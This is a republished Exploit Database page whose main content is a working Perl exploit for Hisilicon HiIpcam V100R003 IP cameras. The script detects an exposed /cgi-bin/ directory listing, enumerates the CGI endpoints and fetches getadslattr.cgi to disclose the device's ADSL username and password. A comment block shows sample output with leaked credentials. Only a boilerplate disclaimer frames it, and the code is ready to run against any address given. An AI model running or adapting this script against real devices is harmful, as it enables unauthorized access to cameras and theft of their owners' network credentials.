Hisilicon HiIpcam V100R003 Remote ADSL – Credentials Disclosure

Exploit Database
117 阅读

作者： Todor Donev

日期： 2019-09-23
类别：
- remote
平台：
- hardware
来源：https://www.exploit-db.com/exploits/47405/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

#!/usr/bin/perl -w

#Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure

# #[

# #[ Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure

# #[ =============================================================

# #[ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>

# #[

# #[Disclaimer:

# #[This or previous programs are for Educational purpose

# #[ONLY. Do not use it without permission. The usual

# #[disclaimer applies, especially the fact that Todor Donev

# #[is not liable for any damages caused by direct or

# #[indirect use of theinformation or functionality provided

# #[by these programs. The author or any Internet provider

# #[bears NO responsibility for content or misuse of these

# #[programs or any derivatives thereof. By using these programs

# #[you accept the fact that any damage (dataloss, system crash,

# #[system compromise, etc.) caused by the useof these programs

# #[are not Todor Donev's responsibility.

# #[

# #[ Use them at your own risk!

# #[

# #[ Initializing the browser

# #[ Server: thttpd/2.25b 29dec2003

# #[ The target is vulnerable

# #[

# #[ Directory Traversal

# #[

# #[ /cgi-bin/..

# #[ /cgi-bin/adsl_init.cgi

# #[ /cgi-bin/chkwifi.cgi

# #[ /cgi-bin/ddns_start.cgi

# #[ /cgi-bin/getadslattr.cgi

# #[ /cgi-bin/getddnsattr.cgi

# #[ /cgi-bin/getinetattr.cgi

# #[ /cgi-bin/getinterip.cgi

# #[ /cgi-bin/getnettype.cgi

# #[ /cgi-bin/getupnp.cgi

# #[ /cgi-bin/getwifi.cgi

# #[ /cgi-bin/getwifiattr.cgi

# #[ /cgi-bin/ptzctrldown.cgi

# #[ /cgi-bin/ptzctrlleft.cgi

# #[ /cgi-bin/ptzctrlright.cgi

# #[ /cgi-bin/ptzctrlup.cgi

# #[ /cgi-bin/ptzctrlzoomin.cgi

# #[ /cgi-bin/ptzctrlzoomout.cgi

# #[ /cgi-bin/ser.cgi

# #[ /cgi-bin/setadslattr.cgi

# #[ /cgi-bin/setddnsattr.cgi

# #[ /cgi-bin/setinetattr.cgi

# #[ /cgi-bin/setwifiattr.cgi

# #[ /cgi-bin/testwifi.cgi

# #[ /cgi-bin/upnp_start.cgi

# #[ /cgi-bin/upnp_stop.cgi

# #[ /cgi-bin/wifi_start.cgi

# #[ /cgi-bin/wifi_stop.cgi

# #[

# #[ File Reading

# #[

# #[ var ip = "" ;

# #[ var adslenable = "" ;

# #[ var username = "hacker" ;

# #[ var password = "133337" ;

# #[ var dnsauto = "1" ;

# #[ var dns1 = "8.8.8.8" ;

# #[ var dns2 = "8.8.4.4" ;

use strict;

use HTTP::Request;

use LWP::UserAgent;

use WWW::UserAgent::Random;

use HTML::TreeBuilder;

$| = 1;

my $host = shift || 'https://192.168.1.1/'; # Full path url to the store

print "\033[2J";#clear the screen

print "\033[0;0H"; #jump to 0,0

my $banner ="\x5b\x20\x0a\x5b\x20\x48\x69\x73\x69\x6c\x69\x63\x6f\x6e\x20\x48\x69\x49\x70\x63\x61\x6d\x20\x56\x31\x30\x30\x52\x30\x30\x33\x20\x52\x65\x6d\x6f\x74\x65\x20\x41\x44\x53\x4c\x20\x43\x72\x65\x64\x65\x6e\x74\x69\x61\x6c\x73\x20\x44\x69\x73\x63\x6c\x6f\x73\x75\x72\x65\x0a\x5b\x20\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x5b\x20\x45\x78\x70\x6c\x6f\x69\x74\x20\x41\x75\x74\x68\x6f\x72\x3a\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x20\x32\x30\x31\x39\x20\x3c\x74\x6f\x64\x6f\x72\x2e\x64\x6f\x6e\x65\x76\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x3e\x0a\x5b\x0a\x5b\x20\x20\x44\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x3a\x0a\x5b\x20\x20\x54\x68\x69\x73\x20\x6f\x72\x20\x70\x72\x65\x76\x69\x6f\x75\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x61\x72\x65\x20\x66\x6f\x72\x20\x45\x64\x75\x63\x61\x74\x69\x6f\x6e\x61\x6c\x20\x70\x75\x72\x70\x6f\x73\x65\x0a\x5b\x20\x20\x4f\x4e\x4c\x59\x2e\x20\x44\x6f\x20\x6e\x6f\x74\x20\x75\x73\x65\x20\x69\x74\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x70\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x2e\x20\x54\x68\x65\x20\x75\x73\x75\x61\x6c\x20\x0a\x5b\x20\x20\x64\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x20\x61\x70\x70\x6c\x69\x65\x73\x2c\x20\x65\x73\x70\x65\x63\x69\x61\x6c\x6c\x79\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x0a\x5b\x20\x20\x69\x73\x20\x6e\x6f\x74\x20\x6c\x69\x61\x62\x6c\x65\x20\x66\x6f\x72\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x73\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x64\x69\x72\x65\x63\x74\x20\x6f\x72\x20\x0a\x5b\x20\x20\x69\x6e\x64\x69\x72\x65\x63\x74\x20\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x20\x20\x69\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x20\x6f\x72\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x61\x6c\x69\x74\x79\x20\x70\x72\x6f\x76\x69\x64\x65\x64\x0a\x5b\x20\x20\x62\x79\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x2e\x20\x54\x68\x65\x20\x61\x75\x74\x68\x6f\x72\x20\x6f\x72\x20\x61\x6e\x79\x20\x49\x6e\x74\x65\x72\x6e\x65\x74\x20\x70\x72\x6f\x76\x69\x64\x65\x72\x20\x0a\x5b\x20\x20\x62\x65\x61\x72\x73\x20\x4e\x4f\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x20\x66\x6f\x72\x20\x63\x6f\x6e\x74\x65\x6e\x74\x20\x6f\x72\x20\x6d\x69\x73\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x0a\x5b\x20\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x6f\x72\x20\x61\x6e\x79\x20\x64\x65\x72\x69\x76\x61\x74\x69\x76\x65\x73\x20\x74\x68\x65\x72\x65\x6f\x66\x2e\x20\x42\x79\x20\x75\x73\x69\x6e\x67\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x0a\x5b\x20\x20\x79\x6f\x75\x20\x61\x63\x63\x65\x70\x74\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x20\x28\x64\x61\x74\x61\x6c\x6f\x73\x73\x2c\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x72\x61\x73\x68\x2c\x20\x0a\x5b\x20\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x6f\x6d\x70\x72\x6f\x6d\x69\x73\x65\x2c\x20\x65\x74\x63\x2e\x29\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x74\x68\x65\x20\x75\x73\x65\x20\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x0a\x5b\x20\x20\x61\x72\x65\x20\x6e\x6f\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x27\x73\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x2e\x0a\x5b\x20\x20\x20\x0a\x5b\x20\x55\x73\x65\x20\x74\x68\x65\x6d\x20\x61\x74\x20\x79\x6f\x75\x72\x20\x6f\x77\x6e\x20\x72\x69\x73\x6b\x21\x0a\x5b\x0a";

print $banner;

print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);

print "[ Initializing the browser\n";

my $user_agent = rand_ua("browsers");

my $browser= LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });

$browser->timeout(30);

$browser->agent($user_agent);

my $target = $host."/cgi-bin/";

my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);

my $response = $browser->request($request) or die "[ Exploit Failed: $!";

print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401');

print "[ Server: ", $response->header('Server'), "\n";

if (defined ($response->as_string()) && ($response->as_string() =~ m/<H2>Index of \/cgi-bin\/<\/H2>/)){

print "[ The target is vulnerable\n";

print "[\n[ Directory Traversal\n";

my $tree = HTML::TreeBuilder->new_from_content($response->as_string());

my @files = $tree->look_down(_tag => 'a');

print "[ ", $_->attr('href'), "\n" for @files;

my $target = $host."/cgi-bin/getadslattr.cgi";

my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);

my $response = $browser->request($request) or die "[ Exploit Failed: $!";

print "[\n[ File Reading\n";

print "[ ", $_, "\n" for split(/\n/,$response->content());

} else {

print "[ Exploit failed! The target isn't vulnerable\n";

exit;

}